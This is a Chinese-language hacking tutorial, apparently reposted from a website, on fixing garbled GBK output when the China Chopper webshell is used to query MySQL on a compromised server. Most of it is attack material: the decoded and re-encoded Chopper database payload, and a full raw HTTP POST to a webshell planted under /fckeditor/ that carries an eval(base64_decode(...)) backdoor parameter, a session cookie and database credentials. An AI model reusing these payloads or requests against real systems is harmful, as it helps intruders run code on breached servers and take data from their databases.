发现gbk等非gb2312的,用菜刀的一句话客户端工具连接后必然乱码,调整工具的编码方式没用,
1.抓包base64解密:post变量中z0就是如下语句(没有红色的语句):
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_gpc();$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];$sql=base64_decode($_POST["z5"]);$T=@mysql_connect($hst,$usr,$pwd);@mysql_select_db($dbn);@mysql_query("set names 'gbk'");$q=@mysql_query($sql);$i=0;while($col=@mysql_field_name($q,$i)){echo($col."\t|\t");$i%2b%2b;}echo("\r\n");while($rs=@mysql_fetch_row($q)){for($c=0;$c
2.重新加密后(注意+号已经被%2b, /被 %2f 代替了:
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X
21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmF
zZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVz
ciwkcHdkKTtAbXlzcWxfc2VsZWN0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbW
VzICdnYmsnIik7JHE9QG15c3FsX3F1ZXJ5KCRzcWwpOyRpPTA7d2hpbGUoJGNvbD1AbX
lzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8oJGNvbC4iXHR8XHQiKTskaSsrO31lY2hvKCJcc
lxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb3coJHEpKXtmb3IoJGM9MDskYzwkaTskY
ysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx0Iik7fWVjaG8oIlxyXG4iKTt9QG15
c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7
3.没法用菜刀了,那就用自定义的post提交工具吧,如nc最原始了:
POST /fckeditor/xxx.php HTTP/1.1
Referer: http://xxx.com
Content-Type: application/x-www-form-urlencoded
User-Agent: User-Agent: Mozilla/4.0 (Windows NT 5.1) Firefox/3.0.0.1
Host: xxxxx.com
Content-Length: 1227
Cache-Control: no-cache
Cookie: __utma=70948559.2011506103.1300526684.1301244532.1301247546.6; __utmz=70948559.1300526684.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=155ec963c319dccb74e9751fa4c73300
0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29
kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2
VsZWN0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbWVzICdnYmsnIik7JHE9QG15c3FsX3F1
ZXJ5KCRzcWwpOyRpPTA7d2hpbGUoJGNvbD1AbXlzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8
oJGNvbC4iXHR8XHQiKTskaSsrO31lY2hvKCJcclxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb
3coJHEpKXtmb3IoJGM9MDskYzwkaTskYysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx
0Iik7fWVjaG8oIlxyXG4iKTt9QG15c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7&z1=
localhost&z2=localnewsssB&z3=local_ddd&z4=db_9518&z5=xxxxx">fuck9518=@eval(base64_decode($_POST[chr(122).chr(48)]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtA
c2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0%2fc3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY
29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfc2VsZW
N0X2RiKCRkYm4pO0BteXNxbF9xdWVyeSgic2V0IG5hbWVzICdnYmsnIik7JHE9QG15c3FsX3F1ZXJ5KCRzc
WwpOyRpPTA7d2hpbGUoJGNvbD1AbXlzcWxfZmllbGRfbmFtZSgkcSwkaSkpe2VjaG8oJGNvbC4iXHR8XH
QiKTskaSsrO31lY2hvKCJcclxuIik7d2hpbGUoJHJzPUBteXNxbF9mZXRjaF9yb3coJHEpKXtmb3IoJGM9MDsk
YzwkaTskYysrKXtlY2hvKHRyaW0oJHJzWyRjXSkpO2VjaG8oIlx0fFx0Iik7fWVjaG8oIlxyXG4iKTt9QG15c3Fs
X2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7&z1=localhost&z2=localnewsssB&z3=local_ddd&z4=
db_9518&z5=xxxxx
其中指定z5为sql语句的base64编码即可,chopper菜刀一句话操作mysql数据库乱码问题》(https://www.unjs.com)。